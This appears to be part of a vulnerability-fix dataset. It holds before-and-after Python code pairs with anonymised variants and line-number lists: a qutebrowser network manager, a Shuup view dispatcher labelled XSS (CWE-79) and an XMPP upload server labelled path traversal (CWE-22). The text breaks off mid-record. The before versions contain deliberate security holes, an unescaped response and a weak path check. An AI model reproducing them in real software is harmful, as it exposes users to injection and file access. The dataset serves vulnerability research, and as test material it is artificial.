except ValueError:
VAR_38 = None
VAR_39 = False
VAR_40 = False
else:
VAR_39 = set(VAR_17).issubset(
self._accepted_ssl_errors[VAR_38])
VAR_40 = set(VAR_17).issubset(
self._rejected_ssl_errors[VAR_38])
log.webview.debug("Already accepted: {} / "
"rejected {}".format(VAR_39, VAR_40))
if VAR_40:
return
elif VAR_39:
VAR_16.ignoreSslErrors()
return
VAR_28 = self._get_abort_signals(VAR_16)
VAR_29 = shared.ignore_certificate_errors(VAR_16.url(), VAR_17,
VAR_28=abort_on)
if VAR_29:
VAR_16.ignoreSslErrors()
VAR_41 = self._accepted_ssl_errors
else:
VAR_41 = self._rejected_ssl_errors
if VAR_38 is not None:
VAR_41[VAR_38] += VAR_17
def FUNC_7(self):
self._accepted_ssl_errors.clear()
self._rejected_ssl_errors.clear()
@pyqtSlot(QUrl)
def FUNC_8(self, VAR_18):
try:
del self._rejected_ssl_errors[VAR_18]
except KeyError:
pass
@pyqtSlot('QNetworkReply*', 'QAuthenticator*')
def FUNC_9(self, VAR_16, VAR_19):
VAR_30 = False
if not self.netrc_used:
self.netrc_used = True
VAR_30 = shared.netrc_authentication(VAR_16.url(),
VAR_19)
if not VAR_30:
VAR_28 = self._get_abort_signals(VAR_16)
shared.authentication_required(VAR_16.url(), VAR_19,
VAR_28=abort_on)
@pyqtSlot('QNetworkProxy', 'QAuthenticator*')
def FUNC_10(self, VAR_20, VAR_19):
VAR_31 = CLASS_0(VAR_20.type(), VAR_20.hostName(), VAR_20.port())
if VAR_31 in VAR_1:
VAR_42, VAR_43 = VAR_1[VAR_31]
VAR_19.setUser(VAR_42)
VAR_19.setPassword(VAR_43)
else:
VAR_44 = '<b>{}</b> says:<br/>{}'.format(
html.escape(VAR_20.hostName()),
html.escape(VAR_19.realm()))
VAR_28 = self._get_abort_signals()
VAR_45 = message.ask(
title="Proxy authentication required", text=VAR_44,
mode=usertypes.PromptMode.user_pwd, VAR_28=abort_on)
if VAR_45 is not None:
VAR_19.setUser(VAR_45.user)
VAR_19.setPassword(VAR_45.password)
VAR_1[VAR_31] = VAR_45
@pyqtSlot()
def FUNC_11(self):
self.adopted_downloads -= 1
log.downloads.debug("Adopted VAR_21 destroyed, {} left.".format(
self.adopted_downloads))
assert self.adopted_downloads >= 0
if self.adopted_downloads == 0:
self.deleteLater()
@pyqtSlot(object) # DownloadItem
def FUNC_12(self, VAR_21):
self.adopted_downloads += 1
log.downloads.debug("Adopted VAR_21, {} adopted.".format(
self.adopted_downloads))
VAR_21.destroyed.connect(self.on_adopted_download_destroyed)
VAR_21.adopt_download.connect(self.adopt_download)
def FUNC_13(self, VAR_22, VAR_23):
VAR_32 = config.val.content.headers.referer
try:
if VAR_32 == 'never':
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
elif (VAR_32 == 'same-domain' and
not urlutils.same_domain(VAR_22.url(), VAR_23)):
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
except urlutils.InvalidUrlError:
pass
@utils.prevent_exceptions(False)
def FUNC_14(self, VAR_24, VAR_22, VAR_25):
VAR_33 = objreg.get('proxy-factory', None)
if VAR_33 is not None:
VAR_46 = VAR_33.get_error()
if VAR_46 is not None:
return networkreply.ErrorNetworkReply(
VAR_22, VAR_46, QNetworkReply.UnknownProxyError,
self)
VAR_34 = VAR_22.url().scheme()
if VAR_34 in self._scheme_handlers:
VAR_47 = self._scheme_handlers[VAR_34](VAR_22)
if VAR_47 is not None:
VAR_47.setParent(self)
return VAR_47
for header, value in shared.custom_headers(VAR_18=VAR_22.url()):
VAR_22.setRawHeader(header, value)
VAR_35 = objreg.get('host-blocker')
if VAR_35.is_blocked(VAR_22.url()):
log.webview.info("Request to {} blocked by host blocker.".format(
VAR_22.url().host()))
return networkreply.ErrorNetworkReply(
VAR_22, VAR_0, QNetworkReply.ContentAccessDenied,
self)
VAR_23 = QUrl()
if self._tab_id is not None:
assert self._win_id is not None
try:
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_23 = VAR_37.url()
except (KeyError, RuntimeError):
VAR_23 = QUrl()
if 'log-requests' in self._args.debug_flags:
VAR_48 = debug.qenum_key(QNetworkAccessManager, VAR_24)
VAR_48 = operation.replace('Operation', '').upper()
log.webview.debug("{} {}, first-party {}".format(
VAR_48,
VAR_22.url().toDisplayString(),
VAR_23.toDisplayString()))
self.set_referer(VAR_22, VAR_23)
return super().createRequest(VAR_24, VAR_22, VAR_25)
|
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
VAR_0 = '%HOSTBLOCK%'
VAR_1 = {}
@attr.s(frozen=True)
class CLASS_0:
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
def FUNC_0(VAR_2):
VAR_6 = [e.upper() for e in VAR_2.name().split('-')]
if VAR_2.usedBits() < 128:
return False
elif VAR_2.keyExchangeMethod() == 'DH' and utils.is_windows:
return False
elif VAR_2.encryptionMethod().upper().startswith('RC4'):
return False
elif VAR_2.encryptionMethod().upper().startswith('DES'):
return False
elif 'MD5' in VAR_6:
return False
elif VAR_2.authenticationMethod() in ['aNULL', 'NULL']:
return False
elif VAR_2.encryptionMethod() in ['eNULL', 'NULL']:
return False
elif 'EXP' in VAR_6 or 'EXPORT' in VAR_6:
return False
elif 'ADH' in VAR_6:
return False
else:
return True
def FUNC_1():
VAR_7 = QSslSocket.defaultCiphers()
log.init.debug("Default Qt ciphers: {}".format(
', '.join(c.name() for c in VAR_7)))
VAR_8 = []
VAR_9 = []
for VAR_2 in VAR_7:
if FUNC_0(VAR_2):
VAR_8.append(VAR_2)
else:
VAR_9.append(VAR_2)
log.init.debug("Disabling bad ciphers: {}".format(
', '.join(c.name() for c in VAR_9)))
QSslSocket.setDefaultCiphers(VAR_8)
class CLASS_1(QNetworkAccessManager):
VAR_10 = pyqtSignal()
def __init__(self, *, VAR_11, VAR_12, VAR_13, VAR_14=None):
log.init.debug("Initializing NetworkManager")
with log.disable_qt_msghandler():
super().__init__(VAR_14)
log.init.debug("NetworkManager FUNC_1 done")
self.adopted_downloads = 0
self._args = objreg.get('args')
self._win_id = VAR_11
self._tab_id = VAR_12
self._private = VAR_13
self._scheme_handlers = {
'qute': webkitqutescheme.handler,
'file': filescheme.handler,
}
self._set_cookiejar()
self._set_cache()
self.sslErrors.connect(self.on_ssl_errors)
self._rejected_ssl_errors = collections.defaultdict(list)
self._accepted_ssl_errors = collections.defaultdict(list)
self.authenticationRequired.connect(self.on_authentication_required)
self.proxyAuthenticationRequired.connect(
self.on_proxy_authentication_required)
self.netrc_used = False
def FUNC_2(self):
if self._private:
VAR_36 = objreg.get('ram-cookie-jar')
else:
VAR_36 = objreg.get('cookie-jar')
self.setCookieJar(VAR_36)
VAR_26 = QCoreApplication.instance()
VAR_36.setParent(VAR_26)
def FUNC_3(self):
if self._private:
return
VAR_26 = QCoreApplication.instance()
VAR_27 = objreg.get('cache')
self.setCache(VAR_27)
cache.setParent(VAR_26)
def FUNC_4(self, VAR_15=None):
VAR_28 = [self.shutting_down]
if VAR_15 is not None:
VAR_28.append(VAR_15.destroyed)
if self._tab_id is not None:
assert self._win_id is not None
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_28.append(VAR_37.load_started)
return VAR_28
def FUNC_5(self):
self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
self.shutting_down.emit()
def FUNC_6(self, VAR_16, VAR_17): # noqa: C901 pragma: no mccabe
VAR_17 = [certificateerror.CertificateErrorWrapper(e) for e in VAR_17]
log.webview.debug("Certificate VAR_17: {!r}".format(
' / '.join(str(err) for err in VAR_17)))
try:
VAR_38 = urlutils.host_tuple(VAR_16.url())
except ValueError:
VAR_38 = None
VAR_39 = False
VAR_40 = False
else:
VAR_39 = set(VAR_17).issubset(
self._accepted_ssl_errors[VAR_38])
VAR_40 = set(VAR_17).issubset(
self._rejected_ssl_errors[VAR_38])
log.webview.debug("Already accepted: {} / "
"rejected {}".format(VAR_39, VAR_40))
if VAR_40:
return
elif VAR_39:
VAR_16.ignoreSslErrors()
return
VAR_28 = self._get_abort_signals(VAR_16)
VAR_29 = shared.ignore_certificate_errors(VAR_16.url(), VAR_17,
VAR_28=abort_on)
if VAR_29:
VAR_16.ignoreSslErrors()
VAR_41 = self._accepted_ssl_errors
else:
VAR_41 = self._rejected_ssl_errors
if VAR_38 is not None:
VAR_41[VAR_38] += VAR_17
def FUNC_7(self):
self._accepted_ssl_errors.clear()
self._rejected_ssl_errors.clear()
@pyqtSlot(QUrl)
def FUNC_8(self, VAR_18):
try:
del self._rejected_ssl_errors[VAR_18]
except KeyError:
pass
@pyqtSlot('QNetworkReply*', 'QAuthenticator*')
def FUNC_9(self, VAR_16, VAR_19):
VAR_30 = False
if not self.netrc_used:
self.netrc_used = True
VAR_30 = shared.netrc_authentication(VAR_16.url(),
VAR_19)
if not VAR_30:
VAR_28 = self._get_abort_signals(VAR_16)
shared.authentication_required(VAR_16.url(), VAR_19,
VAR_28=abort_on)
@pyqtSlot('QNetworkProxy', 'QAuthenticator*')
def FUNC_10(self, VAR_20, VAR_19):
VAR_31 = CLASS_0(VAR_20.type(), VAR_20.hostName(), VAR_20.port())
if VAR_31 in VAR_1:
VAR_42, VAR_43 = VAR_1[VAR_31]
VAR_19.setUser(VAR_42)
VAR_19.setPassword(VAR_43)
else:
VAR_44 = '<b>{}</b> says:<br/>{}'.format(
html.escape(VAR_20.hostName()),
html.escape(VAR_19.realm()))
VAR_28 = self._get_abort_signals()
VAR_45 = message.ask(
title="Proxy authentication required", text=VAR_44,
mode=usertypes.PromptMode.user_pwd, VAR_28=abort_on)
if VAR_45 is not None:
VAR_19.setUser(VAR_45.user)
VAR_19.setPassword(VAR_45.password)
VAR_1[VAR_31] = VAR_45
@pyqtSlot()
def FUNC_11(self):
self.adopted_downloads -= 1
log.downloads.debug("Adopted VAR_21 destroyed, {} left.".format(
self.adopted_downloads))
assert self.adopted_downloads >= 0
if self.adopted_downloads == 0:
self.deleteLater()
@pyqtSlot(object) # DownloadItem
def FUNC_12(self, VAR_21):
self.adopted_downloads += 1
log.downloads.debug("Adopted VAR_21, {} adopted.".format(
self.adopted_downloads))
VAR_21.destroyed.connect(self.on_adopted_download_destroyed)
VAR_21.adopt_download.connect(self.adopt_download)
def FUNC_13(self, VAR_22, VAR_23):
VAR_32 = config.val.content.headers.referer
try:
if VAR_32 == 'never':
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
elif (VAR_32 == 'same-domain' and
not urlutils.same_domain(VAR_22.url(), VAR_23)):
VAR_22.setRawHeader('Referer'.encode('ascii'), QByteArray())
except urlutils.InvalidUrlError:
pass
@utils.prevent_exceptions(False)
def FUNC_14(self, VAR_24, VAR_22, VAR_25):
VAR_33 = objreg.get('proxy-factory', None)
if VAR_33 is not None:
VAR_46 = VAR_33.get_error()
if VAR_46 is not None:
return networkreply.ErrorNetworkReply(
VAR_22, VAR_46, QNetworkReply.UnknownProxyError,
self)
for header, value in shared.custom_headers(VAR_18=VAR_22.url()):
VAR_22.setRawHeader(header, value)
VAR_34 = objreg.get('host-blocker')
if VAR_34.is_blocked(VAR_22.url()):
log.webview.info("Request to {} blocked by host blocker.".format(
VAR_22.url().host()))
return networkreply.ErrorNetworkReply(
VAR_22, VAR_0, QNetworkReply.ContentAccessDenied,
self)
VAR_23 = QUrl()
if self._tab_id is not None:
assert self._win_id is not None
try:
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_23 = VAR_37.url()
except (KeyError, RuntimeError):
VAR_23 = QUrl()
if 'log-requests' in self._args.debug_flags:
VAR_47 = debug.qenum_key(QNetworkAccessManager, VAR_24)
VAR_47 = operation.replace('Operation', '').upper()
log.webview.debug("{} {}, first-party {}".format(
VAR_47,
VAR_22.url().toDisplayString(),
VAR_23.toDisplayString()))
VAR_35 = VAR_22.url().scheme()
if VAR_35 in self._scheme_handlers:
VAR_48 = self._scheme_handlers[VAR_35](VAR_22, VAR_24, VAR_23)
if VAR_48 is not None:
VAR_48.setParent(self)
return VAR_48
self.set_referer(VAR_22, VAR_23)
return super().createRequest(VAR_24, VAR_22, VAR_25)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
24,
29,
37,
38,
41,
42,
45,
47,
51,
52,
57,
59,
61,
64,
65,
68,
71,
73,
74,
75,
76,
77,
78,
79,
81,
84,
87,
90,
92,
95,
96,
102,
110,
114,
115,
117,
119,
136,
140,
142,
146,
147,
168,
175,
176,
177,
181,
186,
187,
192,
198,
199,
206,
211,
212,
213,
216,
218,
237,
240,
246,
257,
262,
266,
274,
287,
308,
312,
321,
330,
334,
337,
338,
343,
344,
346,
347,
349,
350,
351,
352,
353,
354,
355,
359,
364,
375,
382,
385,
393,
394,
395,
396,
398,
406,
407,
408,
410,
418,
421,
20,
46,
54,
98,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
170,
183,
194,
208,
215,
216,
217,
218,
219,
220,
221,
222,
259,
265,
266,
267,
268,
269,
277,
290,
311,
312,
313,
314,
324,
332,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
24,
29,
37,
38,
41,
42,
45,
47,
51,
52,
57,
59,
61,
64,
65,
68,
71,
73,
74,
75,
76,
77,
78,
79,
81,
84,
87,
90,
92,
95,
96,
102,
110,
114,
115,
117,
119,
136,
140,
142,
146,
147,
168,
175,
176,
177,
181,
186,
187,
192,
198,
199,
206,
211,
212,
213,
216,
218,
237,
240,
246,
257,
262,
266,
274,
287,
308,
312,
321,
330,
334,
337,
338,
343,
344,
346,
347,
349,
350,
351,
352,
353,
354,
355,
359,
364,
375,
378,
386,
387,
388,
389,
391,
399,
400,
401,
403,
411,
418,
421,
20,
46,
54,
98,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
170,
183,
194,
208,
215,
216,
217,
218,
219,
220,
221,
222,
259,
265,
266,
267,
268,
269,
277,
290,
311,
312,
313,
314,
324,
332,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from shuup.xtheme._theme import get_current_theme
_VIEW_CACHE = {}
def clear_view_cache(**kwargs):
_VIEW_CACHE.clear()
setting_changed.connect(clear_view_cache, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def _get_view_by_name(theme, view_name):
view = theme.get_view(view_name)
if hasattr(view, "as_view"): # Handle CBVs
view = view.as_view()
if view and not callable(view):
raise ImproperlyConfigured("Error! View `%r` is not callable." % view)
return view
def get_view_by_name(theme, view_name):
if not theme:
return None
cache_key = (theme.identifier, view_name)
if cache_key not in _VIEW_CACHE:
view = _get_view_by_name(theme, view_name)
_VIEW_CACHE[cache_key] = view
else:
view = _VIEW_CACHE[cache_key]
return view
def extra_view_dispatch(request, view):
"""
Dispatch to an Xtheme extra view.
:param request: A request.
:type request: django.http.HttpRequest
:param view: View name.
:type view: str
:return: A response of some kind.
:rtype: django.http.HttpResponse
"""
theme = getattr(request, "theme", None) or get_current_theme(request.shop)
view_func = get_view_by_name(theme, view)
if not view_func:
msg = "Error! %s/%s: Not found." % (getattr(theme, "identifier", None), view)
return HttpResponseNotFound(msg)
return view_func(request)
| # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2021, Shuup Commerce Inc. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from django.utils.html import escape
from shuup.xtheme._theme import get_current_theme
_VIEW_CACHE = {}
def clear_view_cache(**kwargs):
_VIEW_CACHE.clear()
setting_changed.connect(clear_view_cache, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def _get_view_by_name(theme, view_name):
view = theme.get_view(view_name)
if hasattr(view, "as_view"): # Handle CBVs
view = view.as_view()
if view and not callable(view):
raise ImproperlyConfigured("Error! View `%r` is not callable." % view)
return view
def get_view_by_name(theme, view_name):
if not theme:
return None
cache_key = (theme.identifier, view_name)
if cache_key not in _VIEW_CACHE:
view = _get_view_by_name(theme, view_name)
_VIEW_CACHE[cache_key] = view
else:
view = _VIEW_CACHE[cache_key]
return view
def extra_view_dispatch(request, view):
"""
Dispatch to an Xtheme extra view.
:param request: A request.
:type request: django.http.HttpRequest
:param view: View name.
:type view: str
:return: A response of some kind.
:rtype: django.http.HttpResponse
"""
theme = getattr(request, "theme", None) or get_current_theme(request.shop)
view_func = get_view_by_name(theme, view)
if not view_func:
msg = "Error! %s/%s: Not found." % (getattr(theme, "identifier", None), escape(view))
return HttpResponseNotFound(msg)
return view_func(request)
| xss | {
"code": [
" msg = \"Error! %s/%s: Not found.\" % (getattr(theme, \"identifier\", None), view)"
],
"line_no": [
59
]
} | {
"code": [
" msg = \"Error! %s/%s: Not found.\" % (getattr(theme, \"identifier\", None), escape(view))"
],
"line_no": [
60
]
} |
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from shuup.xtheme._theme import get_current_theme
VAR_0 = {}
def FUNC_0(**VAR_1):
VAR_0.clear()
setting_changed.connect(FUNC_0, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def FUNC_1(VAR_2, VAR_3):
VAR_5 = VAR_2.get_view(VAR_3)
if hasattr(VAR_5, "as_view"): # Handle CBVs
VAR_5 = view.as_view()
if VAR_5 and not callable(VAR_5):
raise ImproperlyConfigured("Error! View `%r` is not callable." % VAR_5)
return VAR_5
def FUNC_2(VAR_2, VAR_3):
if not VAR_2:
return None
VAR_6 = (VAR_2.identifier, VAR_3)
if VAR_6 not in VAR_0:
VAR_5 = FUNC_1(VAR_2, VAR_3)
VAR_0[VAR_6] = VAR_5
else:
VAR_5 = VAR_0[VAR_6]
return VAR_5
def FUNC_3(VAR_4, VAR_5):
VAR_2 = getattr(VAR_4, "theme", None) or get_current_theme(VAR_4.shop)
VAR_7 = FUNC_2(VAR_2, VAR_5)
if not VAR_7:
VAR_8 = "Error! %s/%s: Not found." % (getattr(VAR_2, "identifier", None), VAR_5)
return HttpResponseNotFound(VAR_8)
return VAR_7(VAR_4)
|
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.http.response import HttpResponseNotFound
from django.utils.html import escape
from shuup.xtheme._theme import get_current_theme
VAR_0 = {}
def FUNC_0(**VAR_1):
VAR_0.clear()
setting_changed.connect(FUNC_0, dispatch_uid="shuup.xtheme.views.extra.clear_view_cache")
def FUNC_1(VAR_2, VAR_3):
VAR_5 = VAR_2.get_view(VAR_3)
if hasattr(VAR_5, "as_view"): # Handle CBVs
VAR_5 = view.as_view()
if VAR_5 and not callable(VAR_5):
raise ImproperlyConfigured("Error! View `%r` is not callable." % VAR_5)
return VAR_5
def FUNC_2(VAR_2, VAR_3):
if not VAR_2:
return None
VAR_6 = (VAR_2.identifier, VAR_3)
if VAR_6 not in VAR_0:
VAR_5 = FUNC_1(VAR_2, VAR_3)
VAR_0[VAR_6] = VAR_5
else:
VAR_5 = VAR_0[VAR_6]
return VAR_5
def FUNC_3(VAR_4, VAR_5):
VAR_2 = getattr(VAR_4, "theme", None) or get_current_theme(VAR_4.shop)
VAR_7 = FUNC_2(VAR_2, VAR_5)
if not VAR_7:
VAR_8 = "Error! %s/%s: Not found." % (getattr(VAR_2, "identifier", None), escape(VAR_5))
return HttpResponseNotFound(VAR_8)
return VAR_7(VAR_4)
| [
1,
2,
3,
4,
5,
6,
7,
11,
13,
15,
16,
19,
20,
22,
23,
31,
32,
43,
44,
48,
62,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55
] | [
1,
2,
3,
4,
5,
6,
7,
12,
14,
16,
17,
20,
21,
23,
24,
32,
33,
44,
45,
49,
63,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56
] |
0CWE-22
| ########################################################################
# File name: xhu.py
# This file is part of: xmpp-http-upload
#
# LICENSE
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import pathlib
import typing
import flask
app = flask.Flask("xmpp-http-upload")
app.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
application = app
if app.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(app)
def sanitized_join(path: str, root: pathlib.Path) -> pathlib.Path:
result = (root / path).absolute()
if not str(result).startswith(str(root) + "/"):
raise ValueError("resulting path is outside root")
return result
def get_paths(base_path: pathlib.Path):
data_file = pathlib.Path(str(base_path) + ".data")
metadata_file = pathlib.Path(str(base_path) + ".meta")
return data_file, metadata_file
def load_metadata(metadata_file):
with metadata_file.open("r") as f:
return json.load(f)
def get_info(path: str, root: pathlib.Path) -> typing.Tuple[
pathlib.Path,
dict]:
dest_path = sanitized_join(
path,
pathlib.Path(app.config["DATA_ROOT"]),
)
data_file, metadata_file = get_paths(dest_path)
return data_file, load_metadata(metadata_file)
@contextlib.contextmanager
def write_file(at: pathlib.Path):
with at.open("xb") as f:
try:
yield f
except: # NOQA
at.unlink()
raise
@app.route("/")
def index():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def stream_file(src, dest, nbytes):
while nbytes > 0:
data = src.read(min(nbytes, 4096))
if not data:
break
dest.write(data)
nbytes -= len(data)
if nbytes > 0:
raise EOFError
@app.route("/<path:path>", methods=["PUT"])
def put_file(path):
try:
dest_path = sanitized_join(
path,
pathlib.Path(app.config["DATA_ROOT"]),
)
except ValueError:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
verification_key = flask.request.args.get("v", "")
length = int(flask.request.headers.get("Content-Length", 0))
hmac_input = "{} {}".format(path, length).encode("utf-8")
key = app.config["SECRET_KEY"]
mac = hmac.new(key, hmac_input, hashlib.sha256)
digest = mac.hexdigest()
if not hmac.compare_digest(digest, verification_key):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
content_type = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
dest_path.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
data_file, metadata_file = get_paths(dest_path)
try:
with write_file(data_file) as fout:
stream_file(flask.request.stream, fout, length)
with metadata_file.open("x") as f:
json.dump(
{
"headers": {"Content-Type": content_type},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def generate_headers(response_headers, metadata_headers):
for key, value in metadata_headers.items():
response_headers[key] = value
content_type = metadata_headers["Content-Type"]
for mimetype_glob in app.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(content_type, mimetype_glob):
break
else:
response_headers["Content-Disposition"] = "attachment"
response_headers["X-Content-Type-Options"] = "nosniff"
response_headers["X-Frame-Options"] = "DENY"
response_headers["Content-Security-Policy"] = "default-src 'none'; frame-ancestors 'none'; sandbox"
@app.route("/<path:path>", methods=["HEAD"])
def head_file(path):
try:
data_file, metadata = get_info(
path,
pathlib.Path(app.config["DATA_ROOT"])
)
stat = data_file.stat()
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.Response()
response.headers["Content-Length"] = str(stat.st_size)
generate_headers(
response.headers,
metadata["headers"],
)
return response
@app.route("/<path:path>", methods=["GET"])
def get_file(path):
try:
data_file, metadata = get_info(
path,
pathlib.Path(app.config["DATA_ROOT"])
)
except (OSError, ValueError):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.make_response(flask.send_file(
str(data_file),
))
generate_headers(
response.headers,
metadata["headers"],
)
return response
| ########################################################################
# File name: xhu.py
# This file is part of: xmpp-http-upload
#
# LICENSE
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
import contextlib
import errno
import fnmatch
import json
import hashlib
import hmac
import pathlib
import typing
import flask
import werkzeug.exceptions
app = flask.Flask("xmpp-http-upload")
app.config.from_envvar("XMPP_HTTP_UPLOAD_CONFIG")
application = app
if app.config['ENABLE_CORS']:
from flask_cors import CORS
CORS(app)
def get_paths(root: str, sub_path: str) \
-> typing.Tuple[pathlib.Path, pathlib.Path]:
base_path = flask.safe_join(root, sub_path)
data_file = pathlib.Path(base_path + ".data")
metadata_file = pathlib.Path(base_path + ".meta")
return data_file, metadata_file
def load_metadata(metadata_file):
with metadata_file.open("r") as f:
return json.load(f)
def get_info(path: str) -> typing.Tuple[
pathlib.Path,
dict]:
data_file, metadata_file = get_paths(app.config["DATA_ROOT"], path)
return data_file, load_metadata(metadata_file)
@contextlib.contextmanager
def write_file(at: pathlib.Path):
with at.open("xb") as f:
try:
yield f
except: # NOQA
at.unlink()
raise
@app.route("/")
def index():
return flask.Response(
"Welcome to XMPP HTTP Upload. State your business.",
mimetype="text/plain",
)
def stream_file(src, dest, nbytes):
while nbytes > 0:
data = src.read(min(nbytes, 4096))
if not data:
break
dest.write(data)
nbytes -= len(data)
if nbytes > 0:
raise EOFError
@app.route("/<path:path>", methods=["PUT"])
def put_file(path):
try:
data_file, metadata_file = get_paths(app.config["DATA_ROOT"], path)
except werkzeug.exceptions.NotFound:
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
verification_key = flask.request.args.get("v", "")
length = int(flask.request.headers.get("Content-Length", 0))
hmac_input = "{} {}".format(path, length).encode("utf-8")
key = app.config["SECRET_KEY"]
mac = hmac.new(key, hmac_input, hashlib.sha256)
digest = mac.hexdigest()
if not hmac.compare_digest(digest, verification_key):
return flask.Response(
"Invalid verification key",
403,
mimetype="text/plain",
)
content_type = flask.request.headers.get(
"Content-Type",
"application/octet-stream",
)
data_file.parent.mkdir(parents=True, exist_ok=True, mode=0o770)
try:
with write_file(data_file) as fout:
stream_file(flask.request.stream, fout, length)
with metadata_file.open("x") as f:
json.dump(
{
"headers": {"Content-Type": content_type},
},
f,
)
except EOFError:
return flask.Response(
"Bad Request",
400,
mimetype="text/plain",
)
except OSError as exc:
if exc.errno == errno.EEXIST:
return flask.Response(
"Conflict",
409,
mimetype="text/plain",
)
raise
return flask.Response(
"Created",
201,
mimetype="text/plain",
)
def generate_headers(response_headers, metadata_headers):
for key, value in metadata_headers.items():
response_headers[key] = value
content_type = metadata_headers["Content-Type"]
for mimetype_glob in app.config.get("NON_ATTACHMENT_MIME_TYPES", []):
if fnmatch.fnmatch(content_type, mimetype_glob):
break
else:
response_headers["Content-Disposition"] = "attachment"
response_headers["X-Content-Type-Options"] = "nosniff"
response_headers["X-Frame-Options"] = "DENY"
response_headers["Content-Security-Policy"] = "default-src 'none'; frame-ancestors 'none'; sandbox"
@app.route("/<path:path>", methods=["HEAD"])
def head_file(path):
try:
data_file, metadata = get_info(path)
stat = data_file.stat()
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.Response()
response.headers["Content-Length"] = str(stat.st_size)
generate_headers(
response.headers,
metadata["headers"],
)
return response
@app.route("/<path:path>", methods=["GET"])
def get_file(path):
try:
data_file, metadata = get_info(path)
except (OSError, werkzeug.exceptions.NotFound):
return flask.Response(
"Not Found",
404,
mimetype="text/plain",
)
response = flask.make_response(flask.send_file(
str(data_file),
))
generate_headers(
response.headers,
metadata["headers"],
)
return response
| path_disclosure | {
"code": [
"def sanitized_join(path: str, root: pathlib.Path) -> pathlib.Path:",
" result = (root / path).absolute()",
" if not str(result).startswith(str(root) + \"/\"):",
" raise ValueError(\"resulting path is outside root\")",
" return result",
"def get_paths(base_path: pathlib.Path):",
" data_file = pathlib.Path(str(base_path) + \".data\")",
" metadata_file = pathlib.Path(str(base_path) + \".meta\")",
"def get_info(path: str, root: pathlib.Path) -> typing.Tuple[",
" dest_path = sanitized_join(",
" path,",
